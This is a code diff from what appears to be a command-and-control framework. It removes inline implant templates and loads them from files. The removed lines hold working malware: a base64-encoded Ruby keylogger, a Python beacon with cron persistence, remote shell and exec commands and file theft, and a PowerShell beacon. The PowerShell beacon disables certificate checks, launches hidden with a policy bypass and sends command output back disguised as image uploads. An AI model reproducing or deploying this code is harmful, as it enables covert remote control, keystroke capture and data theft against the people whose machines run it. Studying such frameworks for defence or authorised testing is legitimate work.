NNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lD
QkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5p
a05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZMlZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0eE1qZ3BMbVZoWTJnZ1pHOGdmR3Q4RFFvZ0lDQWdhV1lnS0NoaWVYUmxjMXRyUGo0elhTNXZjbVFnUGo0Z0tHc21OeWtwSUNZZ01TQStJREFwRFFvZ0lDQWdJQ0JwWmlCdWIzUWdjSEpsZGw5a2IzZHVXMnRkRFFvZ0lDQWdJQ0FnSUdOaGMyVWdhdzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdNellOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRsYm5SbGNsMGlEUW9nSUNBZ0lDQWdJQ0FnZDJobGJpQTBPQTBLSUNBZ0lDQWdJQ0FnSUNBZ1kzUnliR05vWVhJZ1BTQWlXM1JoWWwwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBME9RMEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaUlDSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXhEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaR1ZzWlhSbFhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXpEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaWE5qWFNJTkNpQWdJQ0FnSUNBZ0lDQjNhR1Z1SURVMURRb2dJQ0FnSUNBZ0lDQWdJQ0JqZEhKc1kyaGhjaUE5SUNKYlkyMWtYU0lOQ2lBZ0lDQWdJQ0FnSUNCM2FHVnVJRFUyRFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkSEpzWTJoaGNpQTlJQ0piYzJocFpuUmRJZzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdOVGNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRqWVhCelhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTREUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJiM0IwYVc5dVhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTVEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJZM1J5YkYwaURRb2dJQ0FnSUNBZ0lD
QWdkMmhsYmlBMk13MEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaVcyWnVYU0lOQ2lBZ0lDQWdJQ0FnSUNCbGJITmxEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSWlEUW9nSUNBZ0lDQWdJR1Z1WkEwS0lDQWdJQ0FnSUNCcFppQmpkSEpzWTJoaGNpQTlQU0FpSWlCaGJtUWdZWE5qYVdrZ1BUMGdNQTBLSUNBZ0lDQWdJQ0FnSUd0amFISWdQU0JEWVhKaWIyNHVSMlYwVTJOeWFYQjBWbUZ5YVdGaWJHVW9VMDFmUzBOSVVsOURRVU5JUlN3Z1UwMWZRMVZTVWtWT1ZGOVRRMUpKVUZRcERRb2dJQ0FnSUNBZ0lDQWdZM1Z5Y2w5aGMyTnBhU0E5SUVOaGNtSnZiaTVMWlhsVWNtRnVjMnhoZEdVb2EyTm9jaXdnYXl3Z2MzUmhkR1VwRFFvZ0lDQWdJQ0FnSUNBZ1kzVnljbDloYzJOcGFTQTlJR04xY25KZllYTmphV2tnUGo0Z01UWWdhV1lnWTNWeWNsOWhjMk5wYVNBOElERU5DaUFnSUNBZ0lDQWdJQ0J3Y21WMlgyUnZkMjViYTEwZ1BTQjBjblZsRFFvZ0lDQWdJQ0FnSUNBZ2FXWWdZM1Z5Y2w5aGMyTnBhU0E5UFNBd0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqWVhCZlpteGhaeUE5SUhSeWRXVU5DaUFnSUNBZ0lDQWdJQ0JsYkhObERRb2dJQ0FnSUNBZ0lDQWdJQ0JoYzJOcGFTQTlJR04xY25KZllYTmphV2tOQ2lBZ0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lDQWdaV3h6YVdZZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQWdJQ0FnSUNCd2NtVjJYMlJ2ZDI1YmExMGdQU0IwY25WbERRb2dJQ0FnSUNBZ0lHVnVaQTBLSUNBZ0lDQWdaVzVrRFFvZ0lDQWdaV3h6WlEwS0lDQWdJQ0FnY0hKbGRsOWtiM2R1VzJ0ZElEMGdabUZzYzJVTkNpQWdJQ0JsYm1RTkNpQWdaVzVrRFFvZ0lHbG1JR0Z6WTJscElDRTlJREFnYjNJZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQnBaaUJoY0hCZmJtRnRaU0FoUFNCc1lYTjBWMmx1Wkc5M0RRb2dJQ0FnSUNCd2RYUnpJQ0pjYmx4dVd5TjdZWEJ3WDI1aGJXVjlYU0F0SUZzamUxUnBiV1V1Ym05M2ZWMWNiaUlOQ2lBZ0lDQWdJR3hoYzNSWGFXNWtiM2NnUFNCaGNIQmZibUZ0WlEwS0lDQWdJR1Z1WkEwS0lDQWdJR2xtSUdOMGNteGphR0Z5SUNFOUlDSWlEUW9nSUNBZ0lDQndjbWx1ZENBaUkzdGpkSEpzWTJoaGNuMGlEUW9nSUNBZ1pXeHphV1lnWVhOamFXa2dQaUF6TWlCaGJtUWdZWE5qYVdrZ1BDQXhNamNOQ2lBZ0lDQWdJR01nUFNCcFppQmpZWEJmWm14aFp5QjBhR1Z1SUdGelkybHBMbU5vY2k1MWNHTmhjMlVnWld4elpTQmhjMk5wYVM1amFISWdaVzVrRFFvZ0lDQWdJQ0J3Y21sdWRDQWlJM3RqZlNJTkNpQWdJQ0JsYkhObERRb2dJQ0FnSUNCd2NtbHVkQ0FpV3lON1lYTmphV2w5WFNJTkNpQWdJQ0JsYm1RTkNpQWdJQ0FrYzNSa2IzVjBMbVpzZFhOb0RRb2dJR1Z1WkEwS0lDQkxaWEp1Wld3dWMyeGxaWEFvTUM0d01Ta05DbVZ1WkEwS0RRbz1cJykpIiB8IHJ1YnkgPiAlcyAyPiYxICYnICUgZmlsZW5hbWUpLnJlYWQoKQp0aW1lLnNsZWVwKDEpCg==" - modb64logger = 
base64.b64decode(b64logger) - modpayload = modb64logger.replace("REPLACEME",filename) - exec(modpayload) - pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() - returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) - return returnval - -def dfile(fname): - if fname: - with open(fname, "rb") as image_file: - imgbytes = image_file.read() - return "0000100001" + imgbytes - -def ufile(base64file, fname): - fname = fname.replace('"','') - filebytes = base64.b64decode(base64file) - try: - output_file = open(fname, 'w') - output_file.write(filebytes) - output_file.close() - return "Uploaded file %%s" %% fname - except Exception as e: - return "Error with source file: %%s" %% e - -def sai(delfile=False): - import uuid - filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess - returnval = "Ran Start Another Implant - File dropped: %%s" %% filename - p = subprocess.Popen(["sh", filename]) - if delfile: - p = subprocess.Popen(["rm", filename]) - returnval = "Ran Start Another Implant - File removed: %%s" %% filename - return returnval - -def persist(): - import uuid, os - dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) - os.mkdir(dircontent) - filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess as s - s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) - return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename - -def remove_persist(): - import subprocess as s - s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) - return "Removed user persistence via crontab: \\r\\n**must delete files manually**" - -def decrypt_bytes_gzip( key, data): - iv = data[0:16] - 
aes = get_encryption(key, iv) - data = aes.decrypt( data ) - import StringIO - import gzip - infile = StringIO.StringIO(data[16:]) - with gzip.GzipFile(fileobj=infile, mode="r") as f: - data = f.read() - return data - -while(True): - cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") - if cstr < kd: - key = "%s" - uri = "%s" - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - try: - time.sleep(timer) - ua='%s' - if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) - else: req=urllib2.Request(server,headers={'User-agent':ua}) - res=urllib2.urlopen(req); - html = res.read() - except Exception as e: - E = e - #print "error %%s" %% e - #print html - if html: - try: - returncmd = decrypt( key, html ) - returncmd = returncmd.rstrip('\\0') - - if "multicmd" in returncmd: - - returncmd = returncmd.replace("multicmd","") - returnval = "" - split = returncmd.split("!d-3dion@LD!-d") - - for cmd in split: - if cmd[:10] == "$sleeptime": - timer = int(cmd.replace("$sleeptime = ","")) - elif cmd[:13] == "download-file": - fname = cmd.replace("download-file ","") - returnval = dfile(fname) - elif cmd[:11] == "upload-file": - fullparams = cmd.replace("upload-file ","") - params = fullparams.split(":") - returnval = ufile(params[1],params[0]) - elif cmd[:19] == "install-persistence": - returnval = persist() - elif cmd[:14] == "get-keystrokes": - returnval = keylog() - elif cmd[:18] == "remove-persistence": - returnval = remove_persist() - elif cmd[:19] == "startanotherimplant": - returnval = sai(delfile=True) - elif cmd[:28] == "startanotherimplant-keepfile": - returnval = sai() - elif cmd[:10] == "loadmodule": - module = cmd.replace("loadmodule","") - exec(module) - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - 
with stdoutIO() as s: - exec module - if s.getvalue(): - returnval = s.getvalue() - else: - returnval = "Module loaded" - except Exception as e: - returnval = "Error with source file: %%s" %% e - - elif cmd.startswith("linuxprivchecker"): - args = cmd[len('linuxprivchecker'):].strip() - args = args.split() - pycode_index = args.index('-pycode') - encoded_module = args[pycode_index +1] - args.pop(pycode_index) - args.pop(pycode_index) - pycode = base64.b64decode(encoded_module) - process = ['python', '-c', pycode] - pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode - import subprocess - returnval = subprocess.check_output(['python', '-c', pycode] + args) - - elif cmd[:6] == "python": - module = cmd.replace("python ","") - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - - returnval = s.getvalue() - - except Exception as e: - returnval = "Error with source file: %%s" %% e - - else: - try: - returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) - except subprocess.CalledProcessError as exc: - returnval = "ErrorCmd: %%s" %% exc.output - - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - opener = urllib2.build_opener() - if (len(cmd) > 200): - cmd = cmd[0:200] - postcookie = encrypt(key, cmd) - data = base64.b64decode(random.choice(icoimage)) - dataimage = data.ljust( 1500, '\\0' ) - dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) - if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - res=urllib2.urlopen(req); - response = res.read() - - except Exception as e: - E = e - #print "error 
%%s" %% e - w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) - self.C2Core = """ -$key="%s" -$global:sleeptime = '%s' - -$payloadclear = @" -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} -`$s="$s" -`$sc="$sc" -function DEC {${function:DEC}} -function ENC {${function:ENC}} -function CAM {${function:CAM}} -function Get-Webclient {${function:Get-Webclient}} -function Primer {${function:primer}} -`$primer = primer -if (`$primer) {`$primer| iex} else { -start-sleep 1800 -primer | iex } -"@ - -$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) -$CompressedStream = New-Object IO.MemoryStream -$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) -$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) -$DeflateStream.Dispose() -$CompressedScriptBytes = $CompressedStream.ToArray() -$CompressedStream.Dispose() -$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) -$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" -$UnicodeEncoder = New-Object System.Text.UnicodeEncoding -$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) -$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" -$payload = $payloadraw -replace "`n", "" - -function GetImgData($cmdoutput) { - $icoimage = @(%s) - - try {$image = $icoimage|get-random}catch{} - - function randomgen - { - param ( - [int]$Length - ) - $set = "...................@..........................Tyscf".ToCharArray() - $result = "" - for ($x = 0; $x -lt $Length; $x++) - {$result += $set | Get-Random} - return 
$result - } - $imageBytes = [Convert]::FromBase64String($image) - $maxbyteslen = 1500 - $maxdatalen = 1500 + ($cmdoutput.Length) - $imagebyteslen = $imageBytes.Length - $paddingbyteslen = $maxbyteslen - $imagebyteslen - $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) - $ImageBytesFull = New-Object byte[] $maxdatalen - [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) - [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) - [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) - $ImageBytesFull -} -function Create-AesManagedObject($key, $IV) { - try { - $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" - } catch { - $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" - } - $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC - $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros - $aesManaged.BlockSize = 128 - $aesManaged.KeySize = 256 - if ($IV) { - if ($IV.getType().Name -eq "String") { - $aesManaged.IV = [System.Convert]::FromBase64String($IV) - } - else { - $aesManaged.IV = $IV - } - } - if ($key) { - if ($key.getType().Name -eq "String") { - $aesManaged.Key = [System.Convert]::FromBase64String($key) - } - else { - $aesManaged.Key = $key - } - } - $aesManaged -} - -function Encrypt-String($key, $unencryptedString) { - $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); - [byte[]] $fullData = $aesManaged.IV + $encryptedData - #$aesManaged.Dispose() - [System.Convert]::ToBase64String($fullData) -} -function Encrypt-Bytes($key, $bytes) { - [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream - $gzipStream = New-Object 
System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) - $gzipStream.Write( $bytes, 0, $bytes.Length ) - $gzipStream.Close() - $bytes = $output.ToArray() - $output.Close() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String($key, $encryptedStringWithIV) { - $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor(); - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); - #$aesManaged.Dispose() - [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) -} -function Encrypt-String2($key, $unencryptedString) { - $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $CompressedStream = New-Object IO.MemoryStream - $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) - $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) - $DeflateStream.Dispose() - $bytes = $CompressedStream.ToArray() - $CompressedStream.Dispose() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String2($key, $encryptedStringWithIV) { - $bytes = $encryptedStringWithIV - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor() - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) - $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream 
(,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() - $output - #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) -} -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} - -$URI= "%s" -$Server = "$s/%s" -$ServerClean = "$sc" -while($true) -{ - $ServerURLS = "$($ServerClean)","$($ServerClean)" - $date = (Get-Date -Format "dd/MM/yyyy") - $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) - $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) - if ($killdate -lt $date) {exit} - $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) - $newsleep = $sleeptimeran|get-random - if ($newsleep -lt 1) {$newsleep = 5} - start-sleep $newsleep - $URLS = %s - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} - - while($ReadCommand) { - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} - $error.clear() - if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { - if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { - $splitcmd = $ReadCommandClear -replace "multicmd","" - $split = $splitcmd -split "!d-3dion@LD!-d" - foreach ($i in $split){ - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - $error.clear() - if ($i.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - 
$UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $i | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $i -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } else { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $Response = Encrypt-String $key $i - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null - } catch{} - } - } - } - elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - - } elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression 
$ReadCommandClear | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $ReadCommandClear -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - - } else { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null - } catch {} - } - $ReadCommandClear = $null - $ReadCommand = $null - } - break - } -}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) + py_implant_core = open("%s/PyImplant-Core.py" % FilesDirectory, 'r').read() + self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) + ps_implant_core = open("%s/PSImplant-Core.ps1" % FilesDirectory, 'r').read() + self.C2Core = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self): 
